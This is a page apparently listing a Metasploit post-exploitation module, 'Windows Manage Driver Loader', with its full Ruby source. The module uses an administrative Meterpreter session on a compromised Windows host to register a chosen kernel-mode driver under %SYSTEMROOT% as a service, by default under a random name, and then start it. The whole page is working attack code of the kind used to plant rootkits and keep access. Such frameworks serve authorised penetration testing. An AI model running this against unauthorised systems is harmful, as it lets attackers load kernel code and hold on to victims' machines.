
Windows Manage Driver Loader

13 Dec 2013 23:07:04 · Reported by Borja Merino <[email protected]> · Type: metasploit

This Metasploit post-exploitation module registers a Kernel Mode Driver (KMD) located under %SYSTEMROOT% as a service and starts it through the Windows Service Control Manager API. It requires an administrative Meterpreter session.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

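class MetasploitModule < Msf::Post
  # Post module that registers a kernel-mode driver (.sys) living under
  # %SYSTEMROOT% as a Windows service and then starts it via the Service
  # Control Manager. Requires an administrative Meterpreter session.
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Error

  # Option value -> SCM start-type constant name understood by
  # Msf::Post::Windows::Services#service_create.
  START_TYPE = {
    'demand' => 'SERVICE_DEMAND_START',
    'boot' => 'SERVICE_BOOT_START',
    'auto' => 'SERVICE_AUTO_START',
    'disabled' => 'SERVICE_DISABLED',
    'system' => 'SERVICE_SYSTEM_START'
  }.freeze

  # Option value -> SCM error-control constant name.
  ERROR_TYPE = {
    'critical' => 'SERVICE_ERROR_CRITICAL',
    'normal' => 'SERVICE_ERROR_NORMAL',
    'severe' => 'SERVICE_ERROR_SEVERE',
    'ignore' => 'SERVICE_ERROR_IGNORE'
  }.freeze

  # Option value -> SCM service-type constant name (all driver types).
  SERVICE_TYPE = {
    'kernel' => 'SERVICE_KERNEL_DRIVER',
    'file_system' => 'SERVICE_FILE_SYSTEM_DRIVER',
    'adapter' => 'SERVICE_ADAPTER',
    'recognizer' => 'SERVICE_RECOGNIZER_DRIVER'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Driver Loader',
        'Description' => %q{
          This module loads a KMD (Kernel Mode Driver) using the Windows Service API.
        },
        'License' => MSF_LICENSE,
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ]
      )
    )

    register_options(
      [
        OptString.new('DRIVER_PATH', [true, 'Driver path in %SYSTEMROOT%. Example: c:\\windows\\system32\\msf.sys']),
        OptString.new('DRIVER_NAME', [false, 'Driver Name.']),
        OptEnum.new('START_TYPE', [true, 'Start type.', 'auto', [ 'boot', 'system', 'auto', 'demand', 'disabled']]),
        OptEnum.new('SERVICE_TYPE', [true, 'Service type.', 'kernel', [ 'kernel', 'file_system', 'adapter', 'recognizer']]),
        OptEnum.new('ERROR_TYPE', [true, 'Error type.', 'ignore', [ 'ignore', 'normal', 'severe', 'critical']])
      ]
    )
  end

  # Module entry point.
  #
  # Checks privileges and the driver location, registers the driver as a
  # service (see #install_driver) and starts it. Every outcome is reported
  # through print_* calls; nothing is returned to the caller.
  def run
    driver = datastore['DRIVER_PATH']
    start = START_TYPE[datastore['START_TYPE']]
    error = ERROR_TYPE[datastore['ERROR_TYPE']]
    service = SERVICE_TYPE[datastore['SERVICE_TYPE']]

    # Without an explicit DRIVER_NAME, use a random alphabetic service name
    # of 6..13 characters.
    name = datastore['DRIVER_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(6..13)) : datastore['DRIVER_NAME']

    unless is_admin?
      print_error("Administrator or better privileges needed. Try 'getsystem' first.")
      return
    end

    unless driver_in_systemroot?(driver)
      print_error('The driver must be inside %SYSTEMROOT%.')
      return
    end

    unless file_exist?(driver)
      print_error("Driver #{driver} does not exist.")
      return
    end

    # install_driver returns true/false, not a Win32 error code. The original
    # compared its result against Windows::Error::SUCCESS (an integer), which
    # is never equal to +true+, so the driver was registered but never started.
    return unless install_driver(name, path: driver, starttype: start, error_control: error, service_type: service)

    # NOTE: if the start fails, the service object created above is left
    # registered in the SCM database; this module does not remove it.
    case service_start(name)
    when Windows::Error::SUCCESS
      print_good('Driver loaded successfully.')
    when Windows::Error::SERVICE_ALREADY_RUNNING
      print_error('Service already started.')
    when Windows::Error::SERVICE_DISABLED
      print_error('Service disabled.')
    else
      print_error('There was an error starting the service.')
    end
  end

  # Registers +name+ with the Service Control Manager.
  #
  # @param name [String] service name to create
  # @param opts [Hash] passed straight to #service_create
  #   (:path, :starttype, :error_control, :service_type as built by #run)
  # @return [Boolean] true when the service object was created, false on any
  #   error. When a service of that name already exists, its ImagePath is
  #   printed so the operator can tell whether it is the intended driver.
  def install_driver(name, opts = {})
    rc = service_create(name, opts)

    case rc
    when Windows::Error::SUCCESS
      print_status("Service object \"#{name}\" added to the Service Control Manager database.")
      true
    when Windows::Error::SERVICE_EXISTS
      print_error('The specified service already exists.')
      # Show ImagePath just to know if the service corresponds to the desired driver.
      existing = service_info(name)
      print_error("Path of driver file in \"#{name}\" service: #{existing[:path]}.")
      false
    else
      print_error("There was an error opening the driver handler. GetLastError=#{rc}.")
      false
    end
  end

  private

  # True when +path+ lies below the target's %SYSTEMROOT% directory.
  #
  # The match is anchored to the start of the path and requires a separator
  # after the root: the original unanchored search accepted any path that
  # merely *contained* the %SYSTEMROOT% string, e.g. a sibling directory such
  # as C:\WindowsOld\evil.sys. Comparison is case-insensitive, as NTFS paths
  # are; a trailing separator on the expanded root is tolerated.
  def driver_in_systemroot?(path)
    root = expand_path('%SYSTEMROOT%').to_s.sub(%r{[\\/]+\z}, '')
    return false if root.empty?

    path.to_s.match?(Regexp.new("\\A#{Regexp.escape(root)}[\\\\/]", Regexp::IGNORECASE))
  end
end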
